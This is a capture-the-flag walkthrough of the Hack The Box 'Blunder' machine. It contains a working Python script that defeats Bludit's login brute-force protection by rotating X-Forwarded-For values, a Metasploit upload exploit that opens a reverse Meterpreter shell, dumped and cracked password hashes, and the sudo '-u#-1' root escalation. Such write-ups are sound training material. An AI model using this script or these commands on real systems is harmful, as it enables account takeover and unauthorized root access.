Recon to foothold
Start with an nmap
kali@kali:~/Documents/HackTheBox/Blunder$ nmap -A -T4 -p- -v 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-13 16:20 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Initiating Ping Scan at 16:20
Scanning 10.10.10.191 [2 ports]
Completed Ping Scan at 16:20, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:20
Completed Parallel DNS resolution of 1 host. at 16:20, 0.03s elapsed
Initiating Connect Scan at 16:20
Scanning 10.10.10.191 [65535 ports]
Discovered open port 80/tcp on 10.10.10.191
Connect Scan Timing: About 22.31% done; ETC: 16:23 (0:01:48 remaining)
Connect Scan Timing: About 56.28% done; ETC: 16:22 (0:00:47 remaining)
Completed Connect Scan at 16:22, 91.84s elapsed (65535 total ports)
Initiating Service scan at 16:22
Scanning 1 service on 10.10.10.191
Completed Service scan at 16:22, 6.06s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.191.
Initiating NSE at 16:22
Completed NSE at 16:22, 2.15s elapsed
Initiating NSE at 16:22
Completed NSE at 16:22, 0.09s elapsed
Initiating NSE at 16:22
Completed NSE at 16:22, 0.00s elapsed
Nmap scan report for 10.10.10.191
Host is up (0.025s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
NSE: Script Post-scanning.
Initiating NSE at 16:22
Completed NSE at 16:22, 0.00s elapsed
Initiating NSE at 16:22
Completed NSE at 16:22, 0.00s elapsed
Initiating NSE at 16:22
Completed NSE at 16:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.54 seconds
Interesting, the box has a closed FTP port, not sure what we can do with that! (Nothing is the answer đ)
The box has a website
None of the immediately accessible pages have comments or anything exciting hidden in the source. There is a robots.txt but itâs pretty much empty
Letâs dirbuster to see if we can find some interesting subdirectories and perhaps nikto for vulnerabliities too
Nikto finds nothing much of interest, a config.php file that we canât read
kali@kali:~/Documents/HackTheBox/Blunder$ nikto -h http://10.10.10.191:80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.191
+ Target Hostname: 10.10.10.191
+ Target Port: 80
+ Start Time: 2020-06-13 16:29:51 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: Bludit
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /admin/config.php: PHP Config file may contain database IDs and passwords.
While pretty quickly dirbuster returns an admin folder
A quick google of this returns the existence of a Bludit CMS https://docs.bludit.com/en/
The documentation talks about an api, but /api/users is not found unfortunately
There is another interesting/alarming entry in the manual concerning âBrute Force Protectionâ. This might cause us problems if we have to try and guess our way in later
What is a Brute Force Attack? This kind of attack consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly -Wiki. How this works? Bludit provides brute force protection to mitigate this kind of attack, and this protection is enabled by default. For each failure to log in, Bludit adds the IP of the user who failed to authenticate to a blacklist. When the user fails for a number of times, Bludit blocks the offending IP for a period of time, and the user canât log in until the block has expired.
A quick check in searchsploit shows us a couple of potential exploits available but reading the details on the first (and most useful) it seems we need login credentials
kali@kali:~$ searchsploit bludit
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
Bludit - Directory Traversal Image File Upload (Metasploit) | php/remote/47699.rb
bludit Pages Editor 3.0.0 - Arbitrary File Upload | php/webapps/46060.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Meanwhile dirbuster has also found a /todo.txt file
Ok, at the least here we may have a possible username, fergus, letâs think about bruteforcing for the password. Perhaps a wordlist based on the webpage might be a good start. Weâll use cewl for this
kali@kali:~/Documents/HackTheBox/Blunder$ cewl -w wordlist.txt -d 10 -m 3 http://10.10.10.191/
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Unfortunately we have seen that there is a default-activated brute-forcing protection, letâs have a google to see if we can find a mitigation for this
Aha! A google for âbludit brute force mitigation bypassâ finds us this page - letâs see if we can utilise this method to attack the login. It turns out that the CMS uses a header âX-Forwarded-Forâ to track what IP addresses to potentially block, so with a script that randomly generates addresses and manipulates this header we can bypass the protection
From that source we get a proof of concept which we modify as follows. (NB We had to make an additional edit here to remove the â\nâ newlines from each word)
#!/usr/bin/env python3
import re
import requests
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []
with open("wordlist.txt") as file:
wordlist = [line.rstrip() for line in file]
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password))
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
break
When we run this we get the following
ali@kali:~/Documents/HackTheBox/Blunder$ vi brute.py
kali@kali:~/Documents/HackTheBox/Blunder$ python brute.py
[*] Trying: the
[*] Trying: Load
[*] Trying: Plugins
--snip--
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain
()
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
()
Excellent, we have found creds: fergus:RolandDeschain
With our found creds we can use the first of the previously found exploits to pop a shell using Metasploit
kali@kali:~$ msfconsole
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v5.0.92-dev ]
+ -- --=[ 2026 exploits - 1102 auxiliary - 343 post ]
+ -- --=[ 566 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
msf5 > search bludit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/bludit_upload_images_exec 2019-09-07 excellent Yes Bludit Directory Traversal Image File Upload Vulnerability
msf5 > use 0
msf5 exploit(linux/http/bludit_upload_images_exec) > options
Module options (exploit/linux/http/bludit_upload_images_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
BLUDITPASS yes The password for Bludit
BLUDITUSER yes The username for Bludit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Bludit
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Bludit v3.9.2
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOSTS 10.10.10.191
RHOSTS => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST tun0
LHOST => tun0
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.35:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading YqhKAOOBkR.png...
[*] Uploading .htaccess...
[*] Executing YqhKAOOBkR.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.35:4444 -> 10.10.10.191:39576) at 2020-06-13 17:03:44 -0400
[+] Deleted .htaccess
meterpreter > dir
Listing: /var/www/bludit-3.9.2/bl-content/tmp
=============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2020-06-13 17:04:29 -0400 thumbnails
meterpreter > getuid
Server username: www-data (33)
And weâre in
Looking around it seems that hugo is our first target and then potentially from there to shaun to root (as shaun has sudo rights by the look of it), or potentially directly to root depending what we find as hugo
meterpreter > cd /home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2020-05-26 04:29:29 -0400 hugo
40755/rwxr-xr-x 4096 dir 2020-04-28 07:13:35 -0400 shaun
meterpreter > cd hugo
meterpreter > ls -la
Listing: /home/hugo
===================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
20666/rw-rw-rw- 0 cha 2020-06-13 09:19:18 -0400 .bash_history
100644/rw-r--r-- 220 fil 2019-11-28 04:59:55 -0500 .bash_logout
100644/rw-r--r-- 3771 fil 2019-11-28 04:59:55 -0500 .bashrc
40700/rwx------ 4096 dir 2020-04-27 09:29:47 -0400 .cache
40700/rwx------ 4096 dir 2019-11-28 06:37:37 -0500 .config
40700/rwx------ 4096 dir 2020-04-27 09:30:11 -0400 .gnupg
40775/rwxrwxr-x 4096 dir 2019-11-28 05:03:01 -0500 .local
40700/rwx------ 4096 dir 2020-04-27 09:29:46 -0400 .mozilla
100644/rw-r--r-- 807 fil 2019-11-28 04:59:55 -0500 .profile
40700/rwx------ 4096 dir 2020-04-27 09:30:11 -0400 .ssh
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Desktop
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Documents
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Downloads
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Music
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Pictures
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Public
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Templates
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Videos
100400/r-------- 33 fil 2020-06-13 09:21:41 -0400 user.txt
meterpreter > cat user.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cd ../shaun
meterpreter > ls
Listing: /home/shaun
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
20666/rw-rw-rw- 0 cha 2020-06-13 09:19:18 -0400 .bash_history
40755/rwxr-xr-x 4096 dir 2019-11-28 08:17:29 -0500 .cache
40755/rwxr-xr-x 4096 dir 2019-11-28 06:13:00 -0500 .config
40700/rwx------ 4096 dir 2019-11-28 08:17:22 -0500 .gnupg
40755/rwxr-xr-x 4096 dir 2019-11-28 04:56:08 -0500 .local
40755/rwxr-xr-x 4096 dir 2019-11-28 06:16:07 -0500 .mozilla
40700/rwx------ 4096 dir 2019-11-28 08:17:22 -0500 .ssh
100644/rw-r--r-- 0 fil 2019-11-28 04:59:45 -0500 .sudo_as_admin_successful
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Desktop
40755/rwxr-xr-x 4096 dir 2020-05-19 10:14:38 -0400 Documents
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Downloads
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Music
40755/rwxr-xr-x 4096 dir 2019-11-28 09:02:17 -0500 Pictures
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Public
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Templates
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Videos
Horizontal privesc to user
Running linpeas we find a couple of interesting details. Firstly we can find a useful bit of info for later perhaps /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485) which could give us root once we have sudo rights (which we know that shaun does)
Linpeas also identifies the presence of an ftp directory in the root, letâs look in there
cd /ftp
ls
D5100_EN.pdf
config
config.json
note.txt
cat note.txt
Hey Sophie
I've left the thing you're looking for in here for you to continue my work
when I leave. The other thing is the same although Ive left it elsewhere too.
Its using the method we talked about; dont leave it on a post-it note this time!
Thanks
Shaun
Letâs download all the files and have a closer look at them
DS100_EN.pdfappears to be a standard pdf file of a Nikon D5100 Digital Camera Userâs Manualconfigappears to be a binary file, function unknown for now. Itâs not executable despite being seemingly binary encodedconfig.jsonhas superhero data
kali@kali:~/Documents/HackTheBox/Blunder$ cat config.json
{
"squadName": "Super hero squad",
"homeTown": "Metro City",
"formed": 2016,
"secretBase": "Super tower",
"active": true,
"members": [
{
"name": "Molecule Man",
"age": 29,
"secretIdentity": "Dan Jukes",
"powers": [
"Radiation resistance",
"Turning tiny",
"Radiation blast"
]
},
{
"name": "Madame Uppercut",
"age": 39,
"secretIdentity": "Jane Wilson",
"powers": [
"Million tonne punch",
"Damage resistance",
"Superhuman reflexes"
]
},
{
"name": "Eternal Flame",
"age": 1000000,
"secretIdentity": "Unknown",
"powers": [
"Immortality",
"Heat Immunity",
"Inferno",
"Teleportation",
"Interdimensional travel"
]
}
]
}
Going back to the bludit docs for a moment we find that the content is stored in a flatfile database with the user creds in a file called bl-content/databases/users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Admin",
"firstName": "Administrator",
"lastName": "",
"role": "admin",
"password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
"salt": "5dde2887e7aca",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""
},
"fergus": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
"salt": "jqxpjfnv",
"email": "",
"registered": "2019-11-27 13:26:44",
"tokenRemember": "",
"tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
}
}
This gives us an admin user password to try and crack
Ah, but there is a second non-active version of bludit installed too in /var/www/bludit-3.10.0a. How about users defined there?
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
Ok, letâs focus on hugo as planned for a moment. Popping his password hash into crackstation.net gives us
So we have some creds for hugo! Letâs use them now hugo:Password120
Letâs connect with our found creds hugo:Password120
$ su - hugo
Password: Password120
hugo@blunder:~$ id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
This also means we can pick up the user flag!
hugo@blunder:~$ cat user.txt
`REDACTED`
We got it! The user flag: REDACTED
Privesc to root
Letâs check what sudo rights hugo has
hugo@blunder:~$ sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
Hmm, what version of sudo are we running, could it be susceptible to CVE-2019-14287? From linpeas
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.25p1
Seems like it might be! Letâs try it
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
`REDACTED`
Yes, WIN! The root flag: REDACTED